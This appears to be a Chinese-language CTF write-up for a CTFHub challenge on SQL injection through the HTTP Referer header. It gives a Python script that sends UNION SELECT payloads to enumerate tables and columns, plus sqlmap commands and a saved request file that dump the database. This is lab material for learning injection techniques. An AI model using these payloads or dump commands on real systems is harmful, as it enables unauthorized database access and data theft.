手注
查询数据库名
查询数据表名
查询字段名
查询字段信息
脚本(from 阿狸)
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
url = "http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/"
import requests
def postPL(pl = '', mask=['</code></br>ID: 1</br>','</div>']):
headers = {'referer':pl}
req = requests.post(url,headers=headers).text
return req[req.find(mask[0])+len(mask[0]):req.find(mask[1],req.find(mask[0]))]
print(postPL('-1 union select 1 , group_concat(table_name) from information_schema.tables where table_schema=database()'))
print(postPL('-1 union select 1 , group_concat(column_name) from information_schema.columns where table_name="mpiqfobzkz"'))
print(postPL('-1 union select 1 , cppsiqpthc from mpiqfobzkz'))
sqlmap(速度较慢,耐心等待)
方法一
代码如下
python2 sqlmap.py -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 --dbs
python2 sqlmap.py -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 -D sqli --tables
python2 sqlmap.py -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T mpiqfobzkz --columns
python2 sqlmap.py -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T mpiqfobzkz -C cppsiqpthc --dump
方法二
尝试注入,成功返回结果
将如下内容保存到sqlmap根目录下
POST / HTTP/1.1
Host: challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080
Connection: close
Referer: 1
Upgrade-Insecure-Requests: 1
使用如下命令查询(referer.txt是保存在sqlmap根目录下的文件名)
python2 sqlmap.py -r referer.txt --level 5 --dbs
python2 sqlmap.py -r referer.txt --level 5 -D sqli --tables
python2 sqlmap.py -r referer.txt --level 5 -D sqli -T mpiqfobzkz --columns
python2 sqlmap.py -r referer.txt --level 5 -D sqli -T mpiqfobzkz -C cppsiqpthc --dump